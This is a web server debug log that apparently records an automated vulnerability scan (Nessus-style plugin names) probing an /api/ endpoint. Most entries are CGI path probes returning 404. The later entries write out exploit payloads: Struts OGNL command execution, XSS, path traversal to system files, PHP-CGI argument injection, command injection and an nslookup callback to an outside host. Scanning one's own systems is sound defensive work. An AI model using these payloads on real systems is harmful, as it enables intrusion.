GET:/api/officescan/default_SMB.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:17.769Z debug: [1667256437767, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:47:17.776Z debug: [1667256437775, duration: 0] GET:/api/officescan/default.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:17.783Z debug: [1667256437782, duration: 0] GET:/api/officescan/default_SMB.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:17.807Z debug: [1667256437805, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:47:17.814Z debug: [1667256437813, duration: 1] GET:/api/officescan/default.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:17.820Z debug: [1667256437820, duration: 0] GET:/api/officescan/default_SMB.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:17.867Z debug: [1667256437866, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:47:17.875Z debug: [1667256437873, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:47:21.336Z debug: [1667256441333, duration: 2] GET:/api/cgi-bin/index.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:26.358Z debug: [1667256446357, duration: 1] GET:/api/cgi-bin/index.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:31.380Z debug: [1667256451379, duration: 1] GET:/api/cgi-bin/login.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:36.402Z debug: [1667256456401, duration: 1] GET:/api/cgi-bin/mailit.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:41.424Z debug: [1667256461423, duration: 0] GET:/api/cgi-bin/mt/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:46.442Z debug: [1667256466441, duration: 1] GET:/api/cgi-bin/mt/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:51.579Z debug: [1667256471578, duration: 0] GET:/api/cgi-bin/mt-static/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:47:56.688Z debug: [1667256476687, duration: 0] GET:/api/cgi-bin/mt-static/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:48:01.785Z debug: [1667256481783, duration: 2] GET:/api/cgi-bin/ncbook/book.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:48:06.832Z debug: [1667256486831, duration: 1] GET:/api/cgi-bin/printenv, reqOrigin: ::1, resCode: 404 +2022-10-31T22:48:11.858Z debug: [1667256491857, duration: 1] GET:/api/cgi-bin/printenv.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:48:16.882Z debug: [1667256496880, duration: 1] GET:/api/cgi-bin/quickstore.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:48:21.922Z debug: [1667256501920, duration: 1] GET:/api/cgi-bin/search, reqOrigin: ::1, resCode: 404 +2022-10-31T22:48:26.945Z debug: [1667256506943, duration: 1] GET:/api/cgi-bin/search.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:48:31.969Z debug: [1667256511966, duration: 0] GET:/api/cgi-bin/search/search.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:48:36.990Z debug: [1667256516989, duration: 0] GET:/api/cgi-bin/status, reqOrigin: ::1, resCode: 404 +2022-10-31T22:48:42.012Z debug: [1667256522011, duration: 1] GET:/api/cgi-bin/status.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:48:47.037Z debug: [1667256527036, duration: 1] GET:/api/cgi-bin/test.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:48:52.058Z debug: [1667256532057, duration: 0] GET:/api/cgi-bin/test.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T22:48:57.080Z debug: [1667256537079, duration: 0] GET:/api/cgi-bin/test-cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:49:02.100Z debug: [1667256542099, duration: 1] GET:/api/cgi-bin/upload.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:49:07.120Z debug: [1667256547119, duration: 0] GET:/api/cgi-bin/urlcount.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:49:12.139Z debug: [1667256552138, duration: 1] GET:/api/cgi-bin/viewcvs.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:49:17.165Z debug: [1667256557164, duration: 0] GET:/api/cgi-bin/wa, reqOrigin: ::1, resCode: 404 +2022-10-31T22:49:22.280Z debug: [1667256562279, duration: 1] GET:/api/cgi-bin/wa.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:49:27.302Z debug: [1667256567301, duration: 1] GET:/api/cgi-bin/wa.exe, reqOrigin: ::1, resCode: 404 +2022-10-31T22:49:32.328Z debug: [1667256572327, duration: 1] GET:/api/cgi-bin/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:49:37.349Z debug: [1667256577348, duration: 0] GET:/api/cgi-bin-sdb/printenv, reqOrigin: ::1, resCode: 404 +2022-10-31T22:49:42.370Z debug: [1667256582369, duration: 0] GET:/api/cgi-mod/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:49:47.388Z debug: [1667256587387, duration: 0] GET:/api/cgi-sys/defaultwebpage.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:49:52.409Z debug: [1667256592408, duration: 0] GET:/api/cgi-sys/entropysearch.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:49:57.433Z debug: [1667256597432, duration: 0] GET:/api/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:50:02.457Z debug: [1667256602455, duration: 1] GET:/api/index.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:50:07.480Z debug: [1667256607479, duration: 1] GET:/api/index.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T22:50:12.503Z debug: [1667256612502, duration: 1] GET:/api/nph-mr.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:50:17.526Z debug: [1667256617524, duration: 1] GET:/api/query.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:50:22.547Z debug: [1667256622546, duration: 1] GET:/api/session_login.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:50:27.571Z debug: [1667256627569, duration: 1] GET:/api/show_bug.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:50:32.591Z debug: [1667256632590, duration: 0] GET:/api/test, reqOrigin: ::1, resCode: 404 +2022-10-31T22:50:37.615Z debug: [1667256637613, duration: 2] GET:/api/test.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:50:42.637Z debug: [1667256642635, duration: 1] GET:/api/ucsm/isSamInstalled.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:50:47.654Z debug: [1667256647653, duration: 1] GET:/api/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:50:52.675Z debug: [1667256652674, duration: 0] GET:/api/wp-login.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:50:57.695Z debug: [1667256657694, duration: 0] GET:/api/wwwadmin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:51:02.716Z debug: [1667256662715, duration: 1] GET:/api/wwwboard.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:51:07.743Z debug: [1667256667742, duration: 0] GET:/api/xampp/cgi.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:51:12.765Z debug: [1667256672763, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:51:12.773Z debug: [1667256672771, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:51:17.792Z debug: [1667256677791, duration: 1] GET:/api/_mt/mt.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:51:22.813Z debug: [1667256682812, duration: 1] GET:/api/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:51:27.836Z debug: [1667256687835, duration: 1] GET:/api/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:51:32.857Z debug: [1667256692856, duration: 1] GET:/api/buglist.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:51:37.922Z debug: [1667256697921, duration: 0] GET:/api/cgi/mid.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:51:42.941Z debug: [1667256702940, duration: 1] GET:/api/cgi-bin/admin, reqOrigin: ::1, resCode: 404 +2022-10-31T22:51:47.963Z debug: [1667256707961, duration: 1] GET:/api/cgi-bin/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:51:52.983Z debug: [1667256712982, duration: 1] GET:/api/cgi-bin/admin.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:51:58.008Z debug: [1667256718003, duration: 4] GET:/api/cgi-bin/administrator, reqOrigin: ::1, resCode: 404 +2022-10-31T22:52:03.027Z debug: [1667256723026, duration: 0] GET:/api/cgi-bin/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:52:08.048Z debug: [1667256728047, duration: 1] GET:/api/cgi-bin/agorn.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:52:13.069Z debug: [1667256733068, duration: 0] GET:/api/cgi-bin/bugreport.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:52:18.091Z debug: [1667256738090, duration: 1] GET:/api/cgi-bin/cart.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:52:23.112Z debug: [1667256743111, duration: 1] GET:/api/cgi-bin/clwarn.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:52:28.132Z debug: [1667256748131, duration: 0] GET:/api/cgi-bin/count.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:52:33.152Z debug: [1667256753151, duration: 1] GET:/api/cgi-bin/Count.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:52:38.174Z debug: [1667256758172, duration: 2] GET:/api/cgi-bin/faqmanager.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:52:43.194Z debug: [1667256763193, duration: 1] GET:/api/cgi-bin/FormHandler.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:52:48.212Z debug: [1667256768211, duration: 1] GET:/api/cgi-bin/FormMail.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:52:53.233Z debug: [1667256773232, duration: 1] GET:/api/cgi-bin/guestbook.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:52:58.257Z debug: [1667256778256, duration: 1] GET:/api/cgi-bin/help.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:53:03.280Z debug: [1667256783279, duration: 0] GET:/api/cgi-bin/hi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:53:08.302Z debug: [1667256788300, duration: 1] GET:/api/cgi-bin/index.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:53:13.323Z debug: [1667256793322, duration: 1] GET:/api/cgi-bin/index.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:53:18.351Z debug: [1667256798348, duration: 2] GET:/api/cgi-bin/index.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T22:53:23.393Z debug: [1667256803392, duration: 0] GET:/api/cgi-bin/login.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:53:28.412Z debug: [1667256808411, duration: 0] GET:/api/cgi-bin/mailit.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:53:33.432Z debug: [1667256813431, duration: 1] GET:/api/cgi-bin/mt/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:53:38.454Z debug: [1667256818453, duration: 1] GET:/api/cgi-bin/mt/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:53:43.476Z debug: [1667256823475, duration: 1] GET:/api/cgi-bin/mt-static/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:53:48.543Z debug: [1667256828542, duration: 1] GET:/api/cgi-bin/mt-static/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:53:53.565Z debug: [1667256833564, duration: 0] GET:/api/cgi-bin/ncbook/book.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:53:58.586Z debug: [1667256838585, duration: 1] GET:/api/cgi-bin/printenv, reqOrigin: ::1, resCode: 404 +2022-10-31T22:54:03.608Z debug: [1667256843607, duration: 0] GET:/api/cgi-bin/printenv.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:54:08.630Z debug: [1667256848628, duration: 2] GET:/api/cgi-bin/quickstore.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:54:13.650Z debug: [1667256853649, duration: 0] GET:/api/cgi-bin/search, reqOrigin: ::1, resCode: 404 +2022-10-31T22:54:18.671Z debug: [1667256858670, duration: 1] GET:/api/cgi-bin/search.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:54:23.693Z debug: [1667256863692, duration: 1] GET:/api/cgi-bin/search/search.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T23:16:07.981Z debug: [1667258167976, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:16:08.008Z debug: [1667258168007, duration: 1] GET:/api/ords/, reqOrigin: ::1, resCode: 404 +2022-10-31T23:16:08.019Z debug: [1667258168017, duration: 1] GET:/api/apex/listenerConfigure, reqOrigin: ::1, resCode: 404 +2022-10-31T23:16:24.815Z debug: [1667258184812, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:16:24.816Z debug: [1667258184814, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:16:24.831Z debug: [1667258184830, duration: 0] GET:/api/SMB/console/html/cgi/cgiChkMasterPwd.exe, reqOrigin: ::1, resCode: 404 +2022-10-31T23:16:24.832Z debug: [1667258184831, duration: 1] GET:/api/WebApp/widget/repository/widgetPool/wp1/widgetBase/modTMLS/app/olh/tmcm_about.html, reqOrigin: ::1, resCode: 404 +2022-10-31T23:16:24.844Z debug: [1667258184843, duration: 1] GET:/api/webapp/login.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T23:16:25.246Z debug: [1667258185244, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:16:25.269Z debug: [1667258185268, duration: 1] GET:/api/login.php, reqOrigin: ::1, resCode: 404 +2022-10-31T23:16:25.693Z debug: [1667258185691, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:37.974Z debug: [1667258257972, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:37.989Z debug: [1667258257988, duration: 1] GET:/api/$%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D=!(%23_memberAccess%5B'allowStaticMethodAccess'%5D=true),(@java.lang.Runtime@getRuntime()).exec('ipconfig').waitFor()%7D.action, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.011Z debug: [1667258258009, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.020Z debug: [1667258258019, duration: 1] POST:/api/flex2gateway/http, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.031Z debug: [1667258258030, duration: 0] POST:/api/flex2gateway/httpsecure, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.042Z debug: [1667258258041, duration: 1] POST:/api/messagebroker/http, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.044Z debug: [1667258258040, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.053Z debug: [1667258258052, duration: 1] POST:/api/messagebroker/httpsecure, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.055Z debug: [1667258258054, duration: 1] GET:/api/internalServerReporting.php, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.062Z debug: [1667258258061, duration: 1] POST:/api/blazeds/messagebroker/http, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.072Z debug: [1667258258071, duration: 1] POST:/api/blazeds/messagebroker/httpsecure, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.081Z debug: [1667258258080, duration: 1] POST:/api/lcds/messagebroker/http, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.091Z debug: [1667258258090, duration: 1] POST:/api/lcds/messagebroker/httpsecure, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.093Z debug: [1667258258092, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.098Z debug: [1667258258097, duration: 1] POST:/api/flex2gateway/http, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.101Z debug: [1667258258101, duration: 0] GET:/api/admin/statistics/ConfigureStatistics, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.109Z debug: [1667258258108, duration: 1] POST:/api/flex2gateway/httpsecure, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.117Z debug: [1667258258116, duration: 1] POST:/api/messagebroker/http, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.124Z debug: [1667258258123, duration: 1] POST:/api/messagebroker/httpsecure, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.134Z debug: [1667258258133, duration: 1] POST:/api/blazeds/messagebroker/http, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.152Z debug: [1667258258151, duration: 1] POST:/api/blazeds/messagebroker/httpsecure, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.153Z debug: [1667258258150, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.160Z debug: [1667258258159, duration: 1] POST:/api/lcds/messagebroker/http, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.161Z debug: [1667258258161, duration: 0] GET:/api/Websense/cgi-bin/WsCgiLogin.exe?Page=login&UserName=nessus%22%3e%3cscript%3ealert('websense_username_xss.nasl')%3c%2fscript%3e, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.167Z debug: [1667258258167, duration: 0] POST:/api/lcds/messagebroker/httpsecure, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.196Z debug: [1667258258194, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.205Z debug: [1667258258204, duration: 1] GET:/api/webhost, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.239Z debug: [1667258258237, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.249Z debug: [1667258258248, duration: 0] GET:/api/console/faces/com_sun_web_ui/help/masthead.jsp?windowTitle=%3c/title%3e%3cscript%3ealert(%27sun_java_web_console_helpwindow_xss.nasl%27)%3c/script%3e, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.262Z debug: [1667258258261, duration: 0] GET:/api/console/faces/com_sun_web_ui/help/helpwindow.jsp?windowTitle=%3c/title%3e%3cscript%3ealert(%27sun_java_web_console_helpwindow_xss.nasl%27)%3c/script%3e, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.337Z debug: [1667258258335, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.346Z debug: [1667258258344, duration: 1] GET:/api/?">, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.369Z debug: [1667258258368, duration: 0] GET:/api/_mem_bin/formslogin.asp?url=>, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.380Z debug: [1667258258378, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.389Z debug: [1667258258387, duration: 1] GET:/api/LoginPage.do, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.394Z debug: [1667258258392, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.402Z debug: [1667258258401, duration: 1] GET:/api/home.jsf?autoScroll=0%2c275)%3b%2f%2f--%3e%3c%2fscript%3e%3cscript%3ealert('myfaces_tomahawk_autoscroll_xss.nasl', reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.423Z debug: [1667258258422, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.430Z debug: [1667258258430, duration: 0] GET:/api/index.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.443Z debug: [1667258258442, duration: 0] GET:/api/Default.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.460Z debug: [1667258258457, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.467Z debug: [1667258258466, duration: 1] GET:/api/item.fts?href=%22%3E%3Cscript%3Ealert(%22ftgate_44002.nasl%22)%3C%2Fscript%3E%3B, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.492Z debug: [1667258258489, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.500Z debug: [1667258258498, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.503Z debug: [1667258258502, duration: 1] GET:/api/login?user=**%3Cscript%3EJavaScript:alert('cpanel_login_user_xss.nasl')%3B%3C%2Fscript%3E, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.515Z debug: [1667258258514, duration: 1] GET:/api/altercast/AlterCast?op=%3cscript%3ealert(%22adobe_document_server_61.nasl%22)%3c%2fscript%3e, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.516Z debug: [1667258258513, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.525Z debug: [1667258258524, duration: 1] GET:/api/nul.dbm, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.605Z debug: [1667258258603, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.612Z debug: [1667258258610, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.624Z debug: [1667258258623, duration: 1] GET:/api/index.php/123, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.631Z debug: [1667258258630, duration: 1] GET:/api/mxhelp/cgi-bin/namazucgi?lang=/../../../../../../../../../../../../../boot.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.633Z debug: [1667258258631, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.642Z debug: [1667258258641, duration: 0] GET:/api/index.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.665Z debug: [1667258258664, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.669Z debug: [1667258258668, duration: 0] GET:/api/scripts/w3who.dll, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.697Z debug: [1667258258695, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.701Z debug: [1667258258700, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.706Z debug: [1667258258705, duration: 1] GET:/api/cgi-bin/filescan, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.714Z debug: [1667258258712, duration: 0] GET:/api/enter.php?goto=%2F, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.716Z debug: [1667258258711, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.726Z debug: [1667258258725, duration: 0] GET:/api/Reporting/login/change_password.php?enable_auth=0, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.754Z debug: [1667258258752, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.756Z debug: [1667258258754, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.762Z debug: [1667258258761, duration: 1] GET:/api/struts/webconsole.html, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.766Z debug: [1667258258764, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.769Z debug: [1667258258767, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.772Z debug: [1667258258771, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.783Z debug: [1667258258782, duration: 1] POST:/api/, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.802Z debug: [1667258258801, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.811Z debug: [1667258258809, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.818Z debug: [1667258258816, duration: 2] GET:/api/?class.classLoader.URLs[0]=struts_2_3_16_1_classloader_manipulation-1667258335, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.823Z debug: [1667258258821, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.824Z debug: [1667258258822, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.833Z debug: [1667258258832, duration: 1] GET:/api/struts/webconsole.html, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.840Z debug: [1667258258839, duration: 0] GET:/api/$%7B%23w=%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.print('Nessus%20Response:%20'),%23w.println('struts_2_3_14_3_command_execution-85026566'),%23w.flush(),%23w.close()%7D.action, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.887Z debug: [1667258258885, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.889Z debug: [1667258258887, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.896Z debug: [1667258258895, duration: 0] GET:/api/.anydomain.test, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.897Z debug: [1667258258897, duration: 0] GET:/api/sc3/console.php?psid=101, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.900Z debug: [1667258258898, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.925Z debug: [1667258258923, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.934Z debug: [1667258258933, duration: 1] GET:/api/dagent/checkprofile.asp?agentid=11111'plus_agentid_sql_injection.nasl, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.937Z debug: [1667258258935, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.945Z debug: [1667258258943, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.950Z debug: [1667258258949, duration: 1] POST:/api/phppath/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.952Z debug: [1667258258951, duration: 1] GET:/api/login_up.php3?login_name=x&passwd=x&locale_id=../../../../../../../../../../../../boot.ini%00.jpg, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.973Z debug: [1667258258972, duration: 1] GET:/api/php/php.exe?c:\winnt\win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.986Z debug: [1667258258984, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:38.992Z debug: [1667258258991, duration: 0] GET:/api/xsql/demo/airport/airport.xsql?xml-stylesheet=none, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:38.994Z debug: [1667258258993, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.001Z debug: [1667258259000, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.006Z debug: [1667258259004, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.018Z debug: [1667258259018, duration: 0] GET:/api/OvCgi/freeIPaddrs.ovpl?netnum=127.0.0.1&netmask=255.255.255.0&netid=127.0.0.1%20|%20id|, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.024Z debug: [1667258259021, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.034Z debug: [1667258259033, duration: 1] GET:/api/log.jsp?log=info&mode=asc&lines=10, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.049Z debug: [1667258259048, duration: 0] GET:/api/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.062Z debug: [1667258259061, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.073Z debug: [1667258259072, duration: 1] GET:/api/api/getServices?name[]=$(/bin/bash%20-c%20%22nslookup%20log4shell-generic-1SXvJdL0raV18USZ3g8Qten.w.nessus.org), reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.090Z debug: [1667258259088, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T23:17:39.102Z debug: [1667258259100, duration: 1] GET:/api/1667258335-mongoose_trailing_slash_disclosure.nasl, reqOrigin: ::1, resCode: 404 +2022-10-31T23:17:39.140Z 